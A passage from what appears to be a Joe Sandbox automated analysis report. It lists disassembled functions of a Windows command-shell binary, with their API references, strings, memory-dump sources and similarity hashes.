memset.MSVCRT ref: 00007FF683F7CAB3
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F8C706

Strings

onecore\base\cmd\maxpathawarestring.cpp, xrefs: 00007FF683F8C6E5

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset
String ID: onecore\base\cmd\maxpathawarestring.cpp
API String ID: 2221118986-3416068913
Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
Instruction ID: 6feede19daedff8a263861b5c2af049aa0bb1972ef452dcfbd8b28b797625347
Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
Instruction Fuzzy Hash: 39118621A09782C1EF54CB55A1562B922A0BF84BA4F1C4239DE6DEB7D5DE2CD480C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F7BE52

Part of subcall function 00007FF683F7BFF0: wcschr.MSVCRT ref: 00007FF683F7C03E

Strings

COMSPEC, xrefs: 00007FF683F7BFC7
2, xrefs: 00007FF683F7BF20

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memsetwcschr
String ID: 2$COMSPEC
API String ID: 1764819092-1738800741
Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
Instruction ID: af8716c93a6102e24566c84b06c72139c0a399450dbd87d92bf2cd06a0a6fa80
Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
Instruction Fuzzy Hash: A5515B21A1A683C5FB689B2594433B922A1BF46B84F0C403ADA4DE77D5DE2CEC45C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F82EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF683F82FA1
wcschr.MSVCRT ref: 00007FF683F82FBC

Part of subcall function 00007FF683F8823C: FindFirstFileExW.KERNELBASE ref: 00007FF683F88280
Part of subcall function 00007FF683F8823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8829D

wcsrchr.MSVCRT ref: 00007FF683F82FEF

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$ErrorFileFindFirstLastwcsrchr
String ID:
API String ID: 4254246844-0
Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
Instruction ID: d44aa6577136afc23e71994883dfd9ec6f96f861a934b9bd8cb41dde16d9e0fe
Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
Instruction Fuzzy Hash: 2F41D125B48742D6EE288B02E44637967A0FF99B84F4C8439DA4E977A5DF3CE041C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F849BA
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F849C8
RtlFreeHeap.NTDLL ref: 00007FF683F849E0

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$EnvironmentFreeProcessVariable
String ID:
API String ID: 2643372051-0
Opcode ID: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
Instruction ID: 1d7d41fffb16185e60e84b835374d7a436f19d32dc968dfcc39ba33230cf6e85
Opcode Fuzzy Hash: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
Instruction Fuzzy Hash: 43F0F972A1DB82C1EB049B66F406074AAE1FF4D7A0B5D9238C52EA3390DE3C9444C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F85A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F85A89
SetConsoleMode.KERNELBASE ref: 00007FF683F85A9E
_get_osfhandle.MSVCRT ref: 00007FF683F85AAC

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _get_osfhandle$ConsoleMode
String ID:
API String ID: 1591002910-0
Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
Instruction ID: a6635ed4932f9209ec510f9700e4ad97301362453e92d870824ab20a3203159b
Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
Instruction Fuzzy Hash: F4F07474A0A642CBE6148B10E856478BBA0FF8AB15F48453DD90EA7320DF3CB815CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNELBASE ref: 00007FF683F8294A

Strings

:, xrefs: 00007FF683F82942

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: DriveType
String ID: :
API String ID: 338552980-336475711
Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
Instruction ID: 6eb34422e3af4cd4c2ab9edfe240db9a92ad67ce0dcc6c5d2dbbaadacc980aa3
Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
Instruction Fuzzy Hash: 80E06566618640C7D7209B50E45206AB760FF8D348F881529E98D93764DF3CD149CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F85AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
Part of subcall function 00007FF683F7CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

Part of subcall function 00007FF683F80A6C: _wcsnicmp.MSVCRT ref: 00007FF683F80AFE
Part of subcall function 00007FF683F80A6C: memset.MSVCRT ref: 00007FF683F80B37
Part of subcall function 00007FF683F80A6C: wcschr.MSVCRT ref: 00007FF683F80B91
Part of subcall function 00007FF683F80A6C: wcsrchr.MSVCRT ref: 00007FF683F80C14

GetConsoleTitleW.KERNELBASE ref: 00007FF683F85B52

Part of subcall function 00007FF683F84224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F84297
Part of subcall function 00007FF683F84224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F842D7
Part of subcall function 00007FF683F84224: memset.MSVCRT ref: 00007FF683F842FD
Part of subcall function 00007FF683F84224: memset.MSVCRT ref: 00007FF683F84368
Part of subcall function 00007FF683F84224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F84380
Part of subcall function 00007FF683F84224: wcsrchr.MSVCRT ref: 00007FF683F843E6
Part of subcall function 00007FF683F84224: lstrcmpW.KERNELBASE ref: 00007FF683F84401

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF683F85BC7

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
String ID:
API String ID: 346765439-0
Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
Instruction ID: 19ea750c31b89191539bc5f6b07da4c77d3847ee932a19d1baecf9d9648df71e
Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
Instruction Fuzzy Hash: 7831AA20B5C682C7FA28E726A4525BD6291FF89BC0F4C5039E94EE7B95DE3CE505C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F89A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF683F89A86
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF683F89A97

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmalloc
String ID:
API String ID: 1412018758-0
Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
Instruction ID: 431260e9a9999b2d0fa64a8765d92f8e75832b9ad63cfda5f68c858073ee83ce
Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
Instruction Fuzzy Hash: FFE0E541F9A60BD5FE2C2B63A8471BA1354BF59B44F5C2438DD5DAB382EE2DB091C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7CD90 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
Instruction ID: c316280409f8a204d9ff277e9532ac2cf873da481576fc64f195b4b4f6a20661
Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
Instruction Fuzzy Hash: 99F03C72A18642C6EB448B15F842078FBA0FF89B41B5C9439D90EA7354DF3CE481CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F84C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

exit.KERNELBASE ref: 00007FF683F84C31

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: exit
String ID:
API String ID: 2483651598-0
Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
Instruction ID: ded4e43e66d3a070d6ac953010f683ef24841e6a2976aad4d8d447877a9e16e8
Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
Instruction Fuzzy Hash: E7C08030704646C7EF1C6732285303D55997F0A301F0C543CC517D3381DD2CD404C240

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F85508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF683F76F97), ref: 00007FF683F8550C

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: DefaultLangUser
String ID:
API String ID: 768647712-0
Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
Instruction ID: e707aed205fb9cf7a6223f901e94f021952f7468073fe90bad1240a4a1167fe8
Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
Instruction Fuzzy Hash: 70E08CA2D5A252CBF5582A4260432B41A53EF6A786F884039C60DAB6C0CD2D2841D248

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F82E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F82E8B

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
Instruction ID: ad791780ff8884508154b41fe5868d7a2a06022cb3f9809a5539915afe4cd15c
Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
Instruction Fuzzy Hash: 00F0B421B0978180EA448B57B5421295290AF48BE0B0C8338EE7D97BC5DE3CD451C300

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF683F75B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F75C20
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F75C39
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F75C4E
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F75C63
memset.MSVCRT ref: 00007FF683F75CAC

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

wcschr.MSVCRT ref: 00007FF683F75E17
memset.MSVCRT ref: 00007FF683F75F23
GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F75F33
InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F75F68
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F75F7C
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F75F91
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F75FA9
InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F75FD1
UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F76012
CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F76088
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?), ref: 00007FF683F760A0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F760AC
RtlFreeHeap.NTDLL ref: 00007FF683F760C2
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F760DA
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F7611F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F76140
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F7615C
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F76173
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F76187
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F7619B
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F761AF
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F761C3
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F761D7

Part of subcall function 00007FF683F809F4: iswspace.MSVCRT ref: 00007FF683F80A11
Part of subcall function 00007FF683F809F4: wcschr.MSVCRT ref: 00007FF683F80A2B

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F761FD
_wcsicmp.MSVCRT ref: 00007FF683F76265
_wcsicmp.MSVCRT ref: 00007FF683F76283
_wcsicmp.MSVCRT ref: 00007FF683F762A3
_wcsicmp.MSVCRT ref: 00007FF683F762C3
_wcsicmp.MSVCRT ref: 00007FF683F762E1
towupper.MSVCRT ref: 00007FF683F762FA
_wcsicmp.MSVCRT ref: 00007FF683F7631A
towupper.MSVCRT ref: 00007FF683F76333
towupper.MSVCRT ref: 00007FF683F7634C
_wcsicmp.MSVCRT ref: 00007FF683F7636C
_wcsicmp.MSVCRT ref: 00007FF683F7638C

Part of subcall function 00007FF683F76530: iswspace.MSVCRT ref: 00007FF683F76572

_wcsnicmp.MSVCRT ref: 00007FF683F76451
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F93DB0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F93DC2
RtlFreeHeap.NTDLL ref: 00007FF683F93DD8
_wcsicmp.MSVCRT ref: 00007FF683F93E5F
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F93EEB
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F93F0C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F93F23
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F93F3A
UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F93F71
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F93F8A

Strings

HIGH, xrefs: 00007FF683F76310
SEPARATE, xrefs: 00007FF683F93C18
REALTIME, xrefs: 00007FF683F93BF1
SHARED, xrefs: 00007FF683F93C3F
WAIT, xrefs: 00007FF683F93C66
NORMAL, xrefs: 00007FF683F93BCB
BELOWNORMAL, xrefs: 00007FF683F76299
AFFINITY, xrefs: 00007FF683F7625B
MAX, xrefs: 00007FF683F93AEB
"%s", xrefs: 00007FF683F93D96
NODE, xrefs: 00007FF683F93B17
MIN, xrefs: 00007FF683F76382
NEWWINDOW, xrefs: 00007FF683F762D7
/K %s, xrefs: 00007FF683F93E1D
, xrefs: 00007FF683F93BE7
ABOVENORMAL, xrefs: 00007FF683F76279
.LNK, xrefs: 00007FF683F76446
/K , xrefs: 00007FF683F93E55
COMSPEC, xrefs: 00007FF683F93DF1
LOW, xrefs: 00007FF683F76362

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
API String ID: 1388555566-2647954630
Opcode ID: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
Instruction ID: 34f6947b8b6eb45b7ee27f7c321ce52090b45a6b79e7e21014dfe5c228163761
Opcode Fuzzy Hash: 5bfa848c86ea83563edc3798e9b62a89bffd279fb50d3622c784112f9d8a1b0e
